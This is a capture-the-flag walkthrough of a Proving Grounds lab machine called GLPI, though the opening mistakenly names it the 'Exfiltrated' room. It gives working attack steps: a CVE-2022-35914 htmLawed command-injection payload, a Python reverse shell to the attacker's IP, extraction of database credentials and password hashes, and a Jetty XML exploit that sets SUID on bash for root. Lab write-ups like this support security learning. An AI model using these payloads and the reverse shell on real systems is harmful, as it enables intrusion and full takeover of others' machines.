In this walk through, we will be going through the Exfiltrated room from Proving Grounds. This room is rated as Easy on the platform and it consist of exploitation of CVE-2022-35914 in order to get the initial foothold. With the DB creds in config files, we have to perform lateral movement and at last, privilege escalation is done via exploitation of a Jetty server instance running on an internal localhost. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | GLPI |
IPaddress | 192.168.193.242 |
Difficulty | Easy |
OS | Linux |
Description | GLPI is an Easy rated Linux machine which requires exploitation of CVE-2022-35914 in order to get the initial foothold. With the DB creds in config files, the attacker have to perform lateral movement and at last, privilege escalation is done via exploitation of a Jetty server instance running on an internal localhost. |
Enumeration:
- I stared off with a regular aggressive nmap scan and found only two ports opened – 22 (SSH) and 80 (HTTP).
$ sudo nmap -A 192.168.193.242 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-25 12:51 IST Nmap scan report for 192.168.193.242 Host is up (0.21s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:8.2p1: | CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778 | C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT* | 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT* | PRION:CVE-2020-12062 5.0 https://vulners.com/prion/PRION:CVE-2020-12062 | PRION:CVE-2016-20012 5.0 https://vulners.com/prion/PRION:CVE-2016-20012 | CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062 | PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041 | CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041 | PRION:CVE-2020-15778 4.4 https://vulners.com/prion/PRION:CVE-2020-15778 | CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 | PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012 | PRION:CVE-2021-41617 3.5 https://vulners.com/prion/PRION:CVE-2021-41617 | PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368 |_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Authentication - GLPI | vulners: | cpe:/a:apache:http_server:2.4.41: | PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631 *EXPLOIT* | EDB-ID:51193 7.5 https://vulners.com/exploitdb/EDB-ID:51193 *EXPLOIT* | CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813 | CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943 | CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720 | CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790 | CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275 | CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691 | CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984 | CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123 | CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225 | CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386 | 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT* | 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882*EXPLOIT* | FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT* | CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438 | CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452 | CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224 | AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C 6.8 https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C *EXPLOIT* | 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT* | 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT* | 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT* | 36618CA8-9316-59CA-B748-82F15F407C4F 6.8 https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F *EXPLOIT* | 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT* | OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122 | CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615 | CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224 | CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721 | CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927 | CVE-2022-36760 5.1 https://vulners.com/cve/CVE-2022-36760 | OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802 | OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622 | F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT* | E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT* | DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT* | CVE-2022-37436 5.0 https://vulners.com/cve/CVE-2022-37436 | CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556 | CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404 | CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614 | CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377 | CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719 | CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160 | CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798 | CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193 | CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641 | CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690 | CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490 | CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934 | CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950 | CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567 | CVE-2006-20001 5.0 https://vulners.com/cve/CVE-2006-20001 | CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320 | CNVD-2023-80558 5.0 https://vulners.com/cnvd/CNVD-2023-80558 | CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122 | CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584 | CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582 | CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223 | C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT* | BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT* | B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT* | A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT* | 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT* | 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT* | 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT* | CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993 |_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422*EXPLOIT* Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Linux 2.6.X (86%) OS CPE: cpe:/o:linux:linux_kernel:2.6 Aggressive OS guesses: Linux 2.6.18 - 2.6.22 (86%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 207.77 ms 192.168.45.1 2 207.71 ms 192.168.45.254 3 208.58 ms 192.168.251.1 4 208.72 ms 192.168.193.242 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.48 seconds
- Enumerated the web server on port 80 and it revealed a login panel for GLPI.
- Fired gobuster on the target to reveal some hidden directories. It gives a bunch of directories back in the results.
gobuster dir -u http://192.168.193.242/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x php
- Looked inside the files directories reveals directory listing of various assets related to the web application.
Initial Access:
- Next, i looked into the /vendor directory which uses a HTMLawed 1.2.6 test application on it and it is vulnerable to CVE-2022-35914. Used the below exploit on it.
#!/bin/bash curl -s -d 'sid=foo&hhook=exec&text=id' -b 'sid=foo' http://192.168.193.242/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
- I captured the request via Burpsuite and added the below parameters to the request before forwarding it to the server. Once the request is processed, we are able to get the contents of the /etc/passwd file.
sid=1rpcfmnkocd44m3mdtg1jfj7qm&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=cat+/etc/passwd
- Next, we will be using the below parameters to execute a command shell on the target giving us a connection back at our netcat listener.
sid=19r7u6o4pl0kn34q54le48sghm&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.154",80));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Lateral Movement (Betty):
- Once we are landed on a shell. Enumerated the file system for any file containing sensitive information. In the config_db.php file. Got the DB creds for GLPI database.
glpi: glpi_db_password
- Used the found creds to log into the DB and dump all the contents of the user table that also includes the password hashes of the user.
mysql -u glpi -p glpi_db_password show databases; use glpi; show tables; select * from glpi_users
- Once i got the password hash of user betty. I tried to update it with my generated password to get access as her. However, it didn’t seems to work.
betty: $2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa password: $2a$10$mRrl51am2AJdOJPxNLIvTOhonLn5x0mr2nJQ4pwj1c4usbnPI5AyS
update glpi_users SET password = '$2a$10$mRrl51am2AJdOJPxNLIvTOhonLn5x0mr2nJQ4pwj1c4usbnPI5AyS' where name = 'betty';
- Looking around the other tables, i found the betty’s plaintext stored in glpi_itilfollowups table.
select * FROM glpi_itilfollowups\
- Using the found password, logged into the target via SSH as user betty and captured the local flag.
betty: SnowboardSkateboardRoller234
Privilege Escalation:
- Next, enumerated the running processes on the target using the below command. It revealed that, a web server is running on localhost on port 8080.
ps auxww
- Performed a SSH port forwarding to forward the connection of 8080 to my localport at 1234.
ssh -L 1234:localhost:8080 [email protected]
- Once the setup is processed successfully, i was able to access the web server on port 1234 at my localhost. The web server was running a Jetty server.
- Found out that the running Jetty server is vulnerable to the below exploit.
Resource: https://twitter.com/ptswarm/status/1555184661751648256?lang=en
- First, we have to create a root.sh file containing commands that will create a copy of the bash binary in the working folder and apply SUID rights to it. We will then use the XML code below to execute the root.sh file. For that, just place the file inside the jetty installation.
Exploit: https://github.com/Mike-n1/tips/blob/main/JettyShell.xml?source=post_page—–555ce2d9234e——————————–
<?xml version="1.0"?> <!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd"> <Configure class="org.eclipse.jetty.server.handler.ContextHandler"> <Call class="java.lang.Runtime" name="getRuntime"> <Call name="exec"> <Arg> <Array type="String"> <Item>/tmp/root.sh</Item> </Array> </Arg> </Call> </Call> </Configure>
cd /opt/jetty/jetty-base/webapps/ echo "chmod +s /bin/bash" > /tmp/root.sh chmod +x /tmp/root.sh nano shell.xml
- Once the bash binary is available to us. Execute it using the below command and become root.
bash -p
- Captured the root flag and completed the machine.
Also Read: PG – Exfiltrated
Conclusion:
So that was “GLPI” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP). Enumerated the web server on port 80 and found out that it is running GLPI and got a htmlLawed directory. Looked online for any known exploit and found out that it is vulnerable to CVE-2022-35914. Used the same and got the initial access on the target. Next, found DB creds in config_db.php file. Using the creds, enumerated the Database and got user betty plain text password from glpi_itilfollowups table. Performed lateral movement via SSH and user betty creds. Moving on, perform SSH port forwarding of port 8080 and found a jetty server running. Exploited it using a exploit discussed on a twitter post and got root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.